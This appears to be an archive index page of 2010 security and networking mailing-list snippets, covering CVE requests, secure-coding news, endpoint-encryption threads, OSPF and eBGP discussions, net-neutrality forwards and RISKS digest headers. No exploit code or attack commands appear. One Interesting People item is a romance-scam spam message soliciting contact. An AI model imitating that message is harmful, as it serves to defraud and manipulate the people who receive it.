Quick check, introduced in 61e44b48 (v2.6.24 and above).
Thanks, Eugene
Re: CVE Request: BGP protocol vulnerability
Steven M. Christey (Aug 31)
The way Cisco has written up this CVE, they are clearly focusing on the
generation of corrupted attributes, not a protocol problem. So, I'd want
a separate CVE for the general BGP design issue.
I can't quite tell the difference between CVE-2009-2055 and what Florian
is requesting a CVE for. In CVE-2009-2055, Cisco seems to be implying
that it's a problem in XR, not the design of the whole protocol - but it's
not immediately clear if they...
Re: CVE id request: libc fortify source information disclosure
Steven M. Christey (Aug 31)
I think this technically qualifies as an "exposure" which is the "E" in
"CVE" - it can be used as a stepping stone for exploitation of another
vulnerability. (Very old, unwieldy definitions here:
http://cve.mitre.org/about/terminology.html)
The risk may be very minimal, but the FORTIFY_SOURCE protection mechanism
is not working "as advertised" - it can be manipulated for an
admittedly-small...
Re: CVE id request: libc fortify source information disclosure
Josh Bressers (Aug 31)
----- "Nico Golde" <oss-security+ml () ngolde de> wrote:
Steve,
What is MITRE policy on this one. By itself I question if this is a
security flaw, but it also would appear to have the potential to turn a DoS
into something worse.
I'm not sure what policy is in this instance.
Thanks.
Re: CVE request: serendipity < 1.5.4 xss
Josh Bressers (Aug 31)
Please use CVE-2010-2957
Thanks.
Re: [PATCH] exec argument expansion can inappropriately triggerOOM-killer
Tetsuo Handa (Aug 31)
Brad Spengler wrote:
As far as I know, RHEL >= 5.3 and Asianux >= 3.2 backported this functionality.
Re: [PATCH] exec argument expansion can inappropriately trigger OOM-killer
Solar Designer (Aug 31)
Brad, Roland -
Thank you for your comments and your work on this.
Agreed.
Alexander
Re: [PATCH] exec argument expansion can inappropriately trigger OOM-killer
Roland McGrath (Aug 31)
This can't be so. There are already many possibilities for preemption
in the get_user_pages code paths (called from get_arg_page).
Indeed, this too is a clear indication that preemption here is already safe.
What "change"? Preemption is already possible, that's nothing new.
The only difference is that we might notice TIF_SIGPENDING having been
set, and bail out either before or after prepare_binprm, and so never
call...
Secure Coding — The Secure Coding list (SC-L) is an open forum for the discussion on developing secure applications. It is moderated by the authors of Secure Coding: Principles and Practices.
Re: Recent technical reports from the CERT Secure Coding Initiative
Jonathan Leffler (Aug 23)
Thanks for the reports, Robert.
Specifications for Managed Strings, Second Edition
Hal Burch, Fred Long, Raunak Rungta, Robert C. Seacord, & David Svoboda
CMU/SEI-2010-TR-018
This report describes a managed string library for the C programming
language. [...]
cover date: May 2010
http://www.sei.cmu.edu/library/abstracts/reports/10tr018.cfm
In the managed string library report, there's a paragraph on p5 that reads:...
[OWASP] APPSEC BRAZIL 2010 - REGISTRATIONS OPEN!
Leonardo Buonsanti (Aug 23)
Greetings everyone!
We're proud to announce that the OWASP AppSec Brazil 2010 Conference
registrations are officially open!
Early bird offers are available! Hurry up!
This year we'll have keynotes by Robert 'Rsnake' Hansen and Jeremiah
Grossman and Samy Kamkar as a Special Speaker!
Registrations are available here:
http://www.owasp.org/index.php/AppSec_Brasil_2010#tab=Registration
All info about the event can be found at:...
SB53: Richard Bejtlich
Gary McGraw (Aug 23)
hi sc-l,
The 53rd (!!) monthly episode of the Silver Bullet Security Podcast is an interview with Richard Bejtlich. Richard is
a well known expert in network monitoring, a subject he has written a book about. Richard is also very knowledgeable
about software security. In fact, I wish that more ops people knew as much as Richard does about software security!
Richard now works for GE and has plenty to say about interfacing with a huge...
Building Real Software: Has Static Analysis reached its limits?
Kenneth Van Wyk (Aug 20)
FYI, nice write-up on the Fortify acquisition as well as the static code analysis space here:
http://swreflections.blogspot.com/2010/08/has-static-analysis-reached-its-limits.html
Cheers,
Ken
-----
Kenneth R. van Wyk
KRvW Associates, LLC
http://www.KRvW.com
Follow us on Twitter at: http://twitter.com/KRvW_Associates
Ruxcon 2010 Final Call For Papers
cfp (Aug 20)
RUXCON 2010 FINAL CALL FOR PAPERS
Ruxcon would like to announce the final call for papers for the sixth annual Ruxcon conference.
This year the conference will take place over the weekend of 20th and 21st of November.
Ruxcon will be held at CQ, Melbourne, Australia.
The deadline for submissions is the 10th of October.
What is Ruxcon?
Ruxcon is the premier technical computer security conference within Australia. Ruxcon aspires to bring...
Software Security Crosses the Threshold
Gary McGraw (Aug 17)
hi sc-l,
As many of you know, I have been collecting and publishing information about the software security space from a
business perspective for several years running. In 2009, revenues from tools and services companies in the software
security market exceeded $500 million. This is an important threshold for multiple reasons: the space continues to
grow even in uncertain economic times, a middle market of small and medium size businesses...
Re: Computerworld: Opinion - Making apps secure is hard work
Gunnar Peterson (Aug 12)
Hi Ken,
You raise some important points. Most infosec is approached as a set of controls, but access control only takes you so
far in the face of malice.
I like this quote from G.K. Chesterton
"The real trouble with this world of ours is not that it is an unreasonable world, nor even that it is a reasonable
one. The commonest kind of trouble is that it is nearly reasonable, but not quite. Life is not an illogicality; yet it
is a trap...
Computerworld: Opinion - Making apps secure is hard work
Kenneth Van Wyk (Aug 12)
I figured this was relevant here, so here's a link to my August column for Computerworld.
Excerpt:
'What's that you say? All the app vetting you've been doing to date consists only of verifying that the apps play by
the rules? That is, that they use only published APIs and such? Well, then, you really have your work cut out for you,
because that's not all that your customers expect.'
To read the complete article see:...
Secure code review/application penetration testing/security architecture positions at Cigital
Joanne Gaitanis (Aug 12)
Good afternoon!
Due to rapid growth/increased client base, we are looking for Application Security Consultants (full time) at all
levels, from 1-20 years experience, from entry level to management.
If qualified and interested, send me your resume in MS WORD doc format to jgaitanis () cigital com
Peruse our website @ http://www.cigital.com !
Must be willing to travel as needed (~25%).
Position Locations: New York City,...
Two resources
Gary McGraw (Aug 09)
hi sc-l,
We just made the Richard Clarke Silver Bullet podcast transcript live. This special 50th edition of Silver Bullet
interview shows up in the July/August IEEE Security & Privacy magazine. A high definition video of the interview is
also available on the silver bullet web page. You can find a pdf copy of the transcript here:
http://www.cigital.com/silverbullet/shows/silverbullet-050-rclarke.pdf
Also of note, the mainstream...
2nd. OWASP Ibero-American Web-Applications Security conference (IBWAS’10) - Call for Training
Carlos Serrão (Aug 01)
2nd. OWASP Ibero-American Web-Applications Security conference (IBWAS’10)
ISCTE – Lisbon University Institute
25th – 26th November 2010
Lisboa, Portugal
http://www.ibwas.com
**CALL FOR TRAINING SESSIONS**
IBWAS and OWASP are currently soliciting training proposals for the OWASP Ibero-American Web Applications Security 2010
Conference (IBWAS'10) which will take place at ISCTE-IUL, Lisboa, Portugal, on November 24 through November 26, 2010....
2nd. OWASP Ibero-American Web Applications Security Conference 2010 (IBWAS'10) - Call for Papers
Carlos Serrão (Aug 01)
2nd. OWASP Ibero-American Web-Applications Security Conference 2010 (IBWAS’10)
ISCTE – Lisbon University Institute
25th – 26th November 2010
Lisboa, Portugal
http://www.ibwas.com
Call for Papers
Introduction
There is a change in the information systems development paradigm. The emergence of Web 2.0 technologies led to the
extensive deployment and use of web-based applications and web services as a way to develop new and flexible...
Re: Static code review for iPhone developers?
Kenneth Van Wyk (Jul 29)
Thanks to all who responded. Great suggestions.
Most focused on the (now) built-in Clang analysis engine (and front-end for LLVM ) that Dan Cornell cited here.
(http://developer.apple.com/mac/library/featuredarticles/StaticAnalysis/index.html)
Clang looks like a useful starting point, as it looks for all sorts of common mistakes found in the C family, including
C++ and Objective C. Memory leaks, uninitialized variables, type mismatches,...
Re: Static code review for iPhone developers?
Dan Cornell (Jul 29)
XCode has a built in static analysis tool, but I'm not sure how thorough it is:
<http://developer.apple.com/mac/library/featuredarticles/StaticAnalysis/index.html>
Not sure if any of the commercial folks support Objective-C yet.
Thanks,
Dan
Static code review for iPhone developers?
Kenneth Van Wyk (Jul 29)
Greetings SC-L folks. Hey, I have a quick question I'd like to submit to this group.
Anyone know of any static code analysis tools that can scan an iPhone app package? Something that integrates with the
Xcode SDK and can at the very least scan through all of the Objective C in the src tree is what I'm looking for. Any
SCA product vendors currently doing this? Please contact me on or off list.
Cheers,
Ken
-----
Kenneth R. van Wyk
KRvW...
Educause Security Discussion — Securing networks and computers in an academic environment.
Re: Question about Endpoint Encryption
SCHALIP, MICHAEL (Sep 02)
Actually - GuardianEdge has been purchased by Symantec - we just implemented it and it's actually working quite well!!
We like that we can interface the whole thing with Symantec/Altiris.....
In a previous life - we used Entrust, which also worked well - but it's a lot of work to get the key authority set up
right, especially if you are serving up to a nationwide customer set....
M
-----Original Message-----
From: The EDUCAUSE Security...
Re: Question about Endpoint Encryption
Basgen, Brian (Sep 02)
We are also using Checkpoint. It has been a usable product that has worked for us on a fairly limited scale (250 high
risk machines), but it is not an enterprise product. They are trying to make it into an enterprise product via their
"security suite", but I think they are a few years away. That said, from the security side, I think it is one of the
better products out there. Last time we looked 2 years ago, many products out there...
Re: Question about Endpoint Encryption
Jason Testart (Sep 02)
I'm about to roll-out SecureDoc by WinMagic. I've delayed our
deployment only because of usability issues on Windows 7/Vista. It has
a feature to synchronize the password for the encryption key (file) with
the operating system password that I am keen on using. It worked solid
with XP but had problems with Vista/7 (because of move from the GINA to
the "credential provider" model, I suppose). I just now have a version
that works...
Re: Question about Endpoint Encryption
James Farr '05 (Sep 02)
I have looked at several vendors. I am concerned about laptops, but also
removable media encryption. I see all the desktops out there and all those
flash drives, CDs and DVDs. The likelihood of finding out about a
lost/stolen $10 flash drive is much less than a $$$ laptop.
Right now the two vendors that are at the top of my list are Credant
Technologies and PGP. I will be interested in others' experience and what
solutions others are...
Re: Question about Endpoint Encryption
Roger Safian (Sep 02)
FWIW we used to use Pointsec. It was a decent product, and I thought the
support we got from both Pointsec and our local reseller was really first
class. Once Pointsec was bought by Checkpoint, things just went downhill fast.
This year we re-negotiated our anti-viral contract with Symantec. As part
of the negotiation we secured a special price for the encryption product.
It works better, has a nice management interface, and, best of...
Re: Question about Endpoint Encryption
Hanson, Mike (Sep 02)
Gregory,
We use Checkpoint endpoint protection and I can say I do not recommend it.
The product was originally from Pointsec and they were a small and
responsive company with a decent product. Then Checkpoint bought them and it
has been more or less downhill since then. Checkpoint is supposedly doing a
complete rewrite of the product now to address problems. We currently have
three different versions of Checkpoint running, since each version is...
Re: Question about Endpoint Encryption
Joel Rosenblatt (Sep 02)
Hi,
We are using GE and have not had these kinds of problems .. the only time we see failures is when there are underlying
hardware problems or when the wrong version of the product gets installed.
You're welcome to pick our brains (for what that is worth :-) - Let me know offline and I'll put you in touch with my GE
expert.
Thanks,
Joel Rosenblatt
Joel Rosenblatt, Manager Network & Computer Security
Columbia Information Security Office...
Re: Question about Endpoint Encryption
David Grisham (Sep 02)
Thank you Gregory,
We purchased McAfee Total Protection suite (endpoint encryption, DLP, device control). We wanted central control from
EPO. So we were sold and installed the latest Version 6. That version turned out to be really a version 1 rewrite and
our pilot found too many problems to deploy across the enterprise.
-- Also we were told we could use DLP with version 6 when we purchased. Turns out that feature won't be released until...
Cert Service Topic of September 14 InCommon Online Forum
Valerie Vogel (Sep 02)
----------
InCommon Online Forum: The InCommon Cert Service
Tuesday, September 14, 2010
1 p.m. EDT / Noon CDT / 11 a.m. MDT / 10 a.m. PDT
http://www.incommon.org/
----------
InCommon has launched a new certificate service, providing unlimited
certificates at one low fee. The research and higher education community
developed this service for pragmatic reasons (primarily to reduce costs)
and innovative reasons (the first real step toward signed...
Question about Endpoint Encryption
Gregory N Pendergast (Sep 02)
I'm looking for feedback on endpoint encryption solutions - both
products you've used or are using and your experiences. VCU purchased
GuardianEdge some time ago, but we've run into a number of problems that
have delayed our deployment and caused me to lose confidence in the
product, to the point that I'm considering dropping it and looking for a
different solution. The problems we've encountered are generally
post-installation failures...
Re: attempts sending fake phishing messages to students and/or employees
Morrow Long (Sep 02)
Thanks. We liked RIT's idea of having a student walk around in a fish
costume and used it for phishing (as well as social networking
security) awareness for frosh orientation (and other personal
appearances):
http://www.yaledailynews.com/news/2010/sep/02/new-its-mascot-hooks-freshmen/
- Morrow
Re: firewall requirements for applications
Charles Buchholtz (Sep 01)
Here are some factors that may be involved in decision/policy to
require different levels of firewall for different applications:
Ingress restrictions
1) Do the applications have the same level of design / code review?
2) Do the applications have the same level of change management / review ?
3) Does the operating environment (OS, libraries, configuration) have
the same security model / review?
4) Does the operating environment (OS,...
Re: Symantec Installation
Eric C. Lukens (Sep 01)
If you run into the problem on new installations or as part of a
multi-application deployment and you do PROPER TESTING FIRST (did I
stress this enough?), you can also remove the LaunchCondition value from
the MSI that checks this registry key. Remember, Symantec put in that
check for a reason, but you also may have a good reason to avoid it.
Use a program like Orca, InstEd, or if you have money InstallShield and
open the SEP MSI. Remove this...
Re: firewall requirements for applications
Jason Testart (Sep 01)
Another issue is user accountability. Assuming the password is embedded
in the exe, what logging/controls do you have on *who* is accessing the
data? The share at least (hopefully) provides some measure of
user-level access control where the exe file itself likely does not (and
if it does, could be more easily defeated). You need to really
understand what controls are in place on the database itself, because it
is indeed all about the risk.
Re: Symantec Installation
Tom Peterson (Sep 01)
Google for this little program, "cleanwipe.exe".
Tom
Director, ITS - User Services
University of Northern Iowa 36 ITTC
Cedar Falls, IA 50614-0522
Phone: 319-273-6460 fax: 319-273-7518
Website: http://www.uni.edu/peterson
Entwistle, Bruce said the following on 9/1/2010 1:49 PM:
NANOG — The North American Network Operators' Group discusses fundamental Internet infrastructure issues such as routing, IP address allocation, and containing malicious activity.
Re: largest OSPF core
Christian Martin (Sep 02)
The stability of the topology plays a most prominent role, but it wouldn't surprise me if an OSPF network largely
comprised of router LSAs (no redistribution), using today's hardware, could easily scale to 1000 nodes in an area.
Some newer techniques may affect this scale in either direction (i.e., subsecond hellos and fast convergence would
negatively impact scale on some platforms, while using demand circuit emulation on p2p links would impact...
Re: largest OSPF core
Alex Ryu (Sep 02)
I think it really depends on what your network topology looks like.
If you have top-down design with star topology to limit the network
connections to individual routers, it may scale well.
But if you connect every router to each other, such as in a full mesh, it
will be a problem during interface flapping or something like that.
Alex
Re: largest OSPF core
Leo Bicknell (Sep 02)
In a message written on Thu, Sep 02, 2010 at 03:20:05PM +0300, lorddoskias wrote:
I'll admit to having seen a network with over 400 devices in an
OSPF area 0, didn't design it, and in the end didn't get to work
on it.
Far as I know worked just fine though, no issues reported. How
well your IGP scales depends a lot more on what you put in it, and
how dynamic your network situation is than the protocol or number
of devices.
Re: largest OSPF core
Valdis . Kletnieks (Sep 02)
On Thu, 02 Sep 2010 14:12:38 EDT, Deepak Jain said:
Well, they were half-right. ;)
RE: largest OSPF core
Deepak Jain (Sep 02)
For giggles:
http://books.google.com/books?id=uBwEAAAAMBAJ&pg=PA59&dq=practical+limits+of+OSPF&hl=en&ei=qud_TNTAFYL68AautJXoAQ&sa=X&oi=book_result&ct=result&resnum=2&ved=0CCwQ6AEwAQ#v=onepage&q=practical%20limit&f=false
Network World April 9, 1990 (page 59):
"There is no practical limit to the number of interconnected networks OSPF and Dual Intermediate System-to-Intermediate
System can...
Re: eBGP Multihop
Nick Hilliard (Sep 02)
Of course, this sort of thing is usually great fun and seems like a Very
Good Idea At The Time. You get your cool configuration in place with lots
of local hax and the network hums along. Then the developer who wrote the
hax leaves because of something or another. And the person who configured
the box leaves due to management politics, and then the Windows IT support
person takes over, along with the smart person on the front-line tech
support...
Re: eBGP Multihop
Hannes Frederic Sowa (Sep 02)
I have not tried yet, but you could have a look at [1]. Perhaps it
could be extended to match your needs.
Do you run an IGP?
Hannes
[1] http://kbfd.sourceforge.net/
Re: largest OSPF core
Nick Hilliard (Sep 02)
You don't expect anyone to actually admit to something like this? :-)
Nick
Re: eBGP Multihop
Steven King (Sep 02)
The last company I worked for moved to eBGP Multi-Hop where there were
two connections to the same provider (same AS). This allowed them to
utilize both links in both directions vs only one link in one direction
and have failover.
As you have mentioned link state detection gets a bit crazy with this.
If you have a MetroE connection (for example) with multiple segments,
this could be problematic. If your side of the link goes down, then you
stop...
Re: eBGP Multihop
Jack Carrozzo (Sep 02)
*magic* that standard router aren't capable of.
This should scare you in a significant manner.
-Jack Carrozzo
Anyone from Trinidad and Tobago TSTT on list?
Hal Lightwood (Sep 02)
Please contact me at your convenience.
Thank you
-- Hal A. Lightwood <hal.lightwood () gmail com>
-- Tel: 510 621 3040
-- Skype: hal.lightwood
largest OSPF core
lorddoskias (Sep 02)
I'm just curious - what is the largest OSPF core (in terms of number
of routers) out there?
Re: Comcast enables 6to4 relays
Joe Maimon (Sep 02)
So the biggest problem with 6to4 relays is that they are not ubiquitous
and/or well run.
Does offering your relays to the world, thereby improving the odds of
off-net traffic returning through them >0, actually offer an improvement
to your own users' experience with 6to4?
Joe
Franck Martin wrote:
eBGP Multihop
Graham Beneke (Sep 02)
I have been asked to investigate moving an entire network to multi-hop
on all the eBGP sessions. Basically all upstreams, downstreams and peers
will eBGP with a route reflector located in the core. This RR will be
some kind of quagga or similar box. The dev guys want to be able to poke
at the BGP feeds directly and do *magic* that standard routers aren't
capable of.
My gut feel is that this is a bad idea. Besides anything else it makes
sane...
Re: ICMPv6 rate limits breaking PMTUD (and traceroute) [Re: Comcast enables 6to4 relays]
Pekka Savola (Sep 01)
...
I've noticed 6to4 relay rate-limiter blackholes before (e.g. in
Your.org relay in AMS, got quickly fixed once I reported it).
FWIW, Linux default is 1000pps and BSD has 100pps which is too low for
a popular relay. In our relays we've used 1000-3000pps.
The majority of ICMPv6's is caused by windows boxes testing the
relay's liveness.
Depending on the MTU configuration of the relay's tunnel interface
(there isn't a BCP on this I...
Interesting People — David Farber moderates this list for discussion involving internet governance, infrastructure, and any other topics he finds fascinating
Hello dear
Victoria Goodluck (Aug 15)
Nice to meet you.
My name is Miss Victoria. I saw your profile today and became interested in you. I would also like to know more about you, and I
want you to send a mail to my email address so that I can give you my picture for you to know who I am. I believe we
can move from here. I am waiting to hear from you. Above all, remember that distance or colour does not matter, but love
matters a lot in life.
Please reply to me. Yours, VICTORIA
FCC Calls Off Net Neutrality Talks
Dave Farber (Aug 05)
Begin forwarded message:
> From: Richard Forno <rforno () infowarrior org>
> Date: August 5, 2010 1:27:48 PM PDT
> To: List Infowarrior <infowarrior () attrition org>
> Cc: Farber Dave <dave () farber net>
> Subject: FCC Calls Off Net Neutrality Talks
>
> FCC Calls Off Net Neutrality Talks
>
> http://online.wsj.com/article/SB10001424052748703748904575411632530886558.html?
>
> By AMY SCHATZ...
re eGoogle and Verizon in Talks on Selling Internet Priority - NYTimes.com
Dave Farber (Aug 05)
Begin forwarded message:
> From: Andrew C Burnette <acb () acb net>
> Date: August 5, 2010 11:04:02 AM PDT
> To: dave () farber net
> Subject: Re: [IP] Google and Verizon in Talks on Selling Internet Priority - NYTimes.com
>
> Dave,
>
> for IP if you wish.
>
> I would guess this could be overlap of timing between the FCC
> discussions and the always ongoing issues of interconnectivity (peering)
> in...
Re yum yum who wanted to meet me while I am in Portland and sent email apple mail loses mail yet again
Dave Farber (Aug 05)
Begin forwarded message:
> From: Mikki Barry <ooblick () ego org>
> Date: August 5, 2010 10:41:33 AM PDT
> To: "dave () farber net" <dave () farber net>
> Subject: Re: [IP] Re yum yum who wanted to meet me while I am in Portland and sent email apple mail loses mail yet
> again
>
> You know, Dave, we must not be the only people who have had apple mail losing our email. I have been around and
>...
paper on technology manias and gullibility, of some interest to IP list
Dave Farber (Aug 05)
Begin forwarded message:
> From: Andrew Odlyzko <odlyzko () umn edu>
> Date: August 5, 2010 10:11:06 AM PDT
> To: dave () farber net
> Subject: paper on technology manias and gullibility, of some interest to IP list
>
> Dave,
>
> Since the readers of the IP list are discussed in Section 5 of this
> paper, they might like to learn of it directly, so they have a chance
> to react.
>
> Best regards,...
some "facts" Verizon, Too! re GOOGLE DENIES IT--Google and Verizon in Talks on Selling Internet Priority - NYTimes.com
Dave Farber (Aug 05)
Begin forwarded message:
> From: "Sullivan, Michael" <MSullivan () wbklaw com>
> Date: August 5, 2010 9:07:52 AM PDT
> To: "dave () farber net" <dave () farber net>
> Subject: RE: [IP] Verizon, Too! re GOOGLE DENIES IT--Google and Verizon in Talks on Selling Internet Priority -
> NYTimes.com
>
> Both Verizon and Google have specifically said the NY Times article got it all wrong.
>
>...
re GOOGLE DENIES IT--Google and Verizon in Talks on Selling Internet Priority - NYTimes.com
Dave Farber (Aug 05)
Begin forwarded message:
> From: h_bray () globe com
> Date: August 5, 2010 8:42:21 AM PDT
> To: dave () farber net
> Cc: ip <ip () v2 listbox com>
> Subject: Re: [IP] GOOGLE DENIES IT--Google and Verizon in Talks on Selling Internet Priority - NYTimes.com
>
> FWIW, Google says the NY Times story is "quite simply wrong."
>
> http://www.pcmag.com/article2/0,2817,2367436,00.asp
>
>
>...
re Google and Verizon in Talks on Selling Internet Priority - NYTimes.com
Dave Farber (Aug 05)
Begin forwarded message:
> From: George Ou <George.Ou () digitalsociety org>
> Date: August 5, 2010 8:06:09 AM PDT
> To: "dave () farber net" <dave () farber net>
> Subject: RE: [IP] Google and Verizon in Talks on Selling Internet Priority - NYTimes.com
>
> For IP if you wish.
>
> This story is devoid of facts and self contradictory.
>...
Re yum yum who wanted to meet me while I am in Portland and sent email apple mail loses mail yet again
Dave Farber (Aug 05)
Dave
-------------------------------------------
Archives: https://www.listbox.com/member/archive/247/=now
RSS Feed: https://www.listbox.com/member/archive/rss/247/
Modify Your Subscription: https://www.listbox.com/member/?member_id=18849915&id_secret=18849915-aa268125
Unsubscribe Now: https://www.listbox.com/unsubscribe/?member_id=18849915&id_secret=18849915-32545cb4
Powered by Listbox: http://www.listbox.com
Google and Verizon in Talks on Selling Internet Priority - NYTimes.com
Dave Farber (Aug 05)
http://www.nytimes.com/2010/08/05/technology/05secret.html?_r=1
For a change -- I will not say "I told you so". Djf
Google, Verizon, the FCC and Net Neutrality
Dave Farber (Aug 04)
Begin forwarded message:
> From: Gene Gaines <gene.gaines () gainesgroup com>
> Date: August 4, 2010 9:33:59 PM PDT
> To: David Farber <dave () farber net>
> Subject: Google, Verizon, the FCC and Net Neutrality
>
> Two views of a stunningly important issue
>
> FIRST: From the New York Times, Aug 4, 2010:
>
> Google and Verizon in Talks on Selling Internet Priority
>
> WASHINGTON — Google and...
Outsourcing We Can Believe In
Dave Farber (Aug 04)
Begin forwarded message:
> From: Randall Webmail <rvh40 () insightbb com>
> Date: August 4, 2010 2:28:51 PM PDT
> To: johnmacsgroup () yahoogroups com, dewayne () warpspeed com, dave () farber net
> Subject: Outsourcing We Can Believe In
>
> U.S. To Train 3,000 Offshore IT Workers
>
> $22 million, federally-backed program aims to help outsourcers in South Asia become more fluent in areas like Java
>...
Book review: Skating on Stilts - WSJ.com
Dave Farber (Aug 04)
http://online.wsj.com/article/SB10001424052748703545604575407380884722858.html
So they lied. This is surprising why?
Dave Farber (Aug 04)
Begin forwarded message:
> From: Randall Webmail <rvh40 () insightbb com>
> Date: August 4, 2010 8:36:43 AM PDT
> To: johnmacsgroup () yahoogroups com, dewayne () warpspeed com, dave () farber net
> Subject: So they lied. This is surprising why?
>
> "For the last few years, federal agencies have defended body scanning by insisting that all images will be discarded
> as soon as they're viewed. The...
YUM YUM
Dave Farber (Aug 03)
That is Jakes in Portland, Oregon
Begin forwarded message:
> From: Dave Farber <dave () farber net>
> Date: August 3, 2010 4:41:04 PM PDT
> To: ip <ip () v2 listbox com>
> Subject: [IP] YUM YUM
> Reply-To: dave () farber net
>
> I am sitting at Jakes having finished a bowl of Manhattan clam chowder.
>
> Wonderful
>
>
> -------------------------------------------
> Archives:...
The RISKS Forum — Peter G. Neumann moderates this regular digest of current events which demonstrate risks to the public in computers and related systems. Security risks are often discussed.
Risks Digest 26.14
RISKS List Owner (Aug 30)
RISKS-LIST: Risks-Forum Digest Monday 30 August 2010 Volume 26 : Issue 14
ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy
***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/26.14.html>
The current issue can be...
Risks Digest 26.13
RISKS List Owner (Aug 02)
RISKS-LIST: Risks-Forum Digest Monday 2 August 2010 Volume 26 : Issue 13
ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy
***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/26.13.html>
The current issue can be...
Risks Digest 26.12
RISKS List Owner (Jul 30)
RISKS-LIST: Risks-Forum Digest Friday 30 July 2010 Volume 26 : Issue 12
ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy
***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/26.12.html>
The current issue can be...
Risks Digest 26.11
RISKS List Owner (Jul 21)
RISKS-LIST: Risks-Forum Digest Wednesday 21 July 2010 Volume 26 : Issue 11
ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy
***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/26.11.html>
The current issue can be...
Risks Digest 26.10
RISKS List Owner (Jul 10)
RISKS-LIST: Risks-Forum Digest Saturday 10 July 2010 Volume 26 : Issue 10
ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy
***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/26.10.html>
The current issue can be...
Risks Digest 26.09
RISKS List Owner (Jul 03)
RISKS-LIST: Risks-Forum Digest Saturday 3 July 2010 Volume 26 : Issue 09
ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy
***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/26.09.html>
The current issue can be...
Risks Digest 26.08
RISKS List Owner (Jun 10)
RISKS-LIST: Risks-Forum Digest Thursday 10 June 2010 Volume 26 : Issue 08
ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy
***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/26.08.html>
The current issue can be...
Risks Digest 26.07
RISKS List Owner (May 29)
RISKS-LIST: Risks-Forum Digest Saturday 29 May 2010 Volume 26 : Issue 07
ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy
***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/26.07.html>
The current issue can be...
Risks Digest 26.06
RISKS List Owner (May 08)
RISKS-LIST: Risks-Forum Digest Saturday 8 May 2010 Volume 26 : Issue 06
ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy
***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/26.06.html>
The current issue can be...
Risks Digest 26.05
RISKS List Owner (May 04)
RISKS-LIST: Risks-Forum Digest Tuesday 4 April 2010 Volume 26 : Issue 05
ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy
***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/26.05.html>
The current issue can be...
Risks Digest 26.04
RISKS List Owner (Apr 28)
RISKS-LIST: Risks-Forum Digest Wednesday 28 April 2010 Volume 26 : Issue 04
ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy
***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/26.04.html>
The current issue can be...
Risks Digest 26.03
RISKS List Owner (Apr 25)
ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy
***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/26.03.html>
The current issue can be found at
<http://www.csl.sri.com/users/risko/risks.txt>
Contents:...
Risks Digest 26.02
RISKS List Owner (Apr 18)
RISKS-LIST: Risks-Forum Digest Sunday 18 April 2010 Volume 26 : Issue 02
ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy
***** See last item for further information, disclaimers, caveats, etc. *****
This issue is archived at <http://www.risks.org> as
<http://catless.ncl.ac.uk/Risks/26.02.html>
The current issue can be...
Risks Digest 26.01
RISKS List Owner (Apr 08)
RISKS-LIST: Risks-Forum Digest Thursday 8 April 2010 Volume 26 : Issue 01
ACM FORUM ON RISKS TO THE PUBLIC IN COMPUTERS AND RELATED SYSTEMS (comp.risks)
Peter G. Neumann, moderator, chmn ACM Committee on Computers and Public Policy
***** See last item for further information, disclaimers, caveats, etc. *****
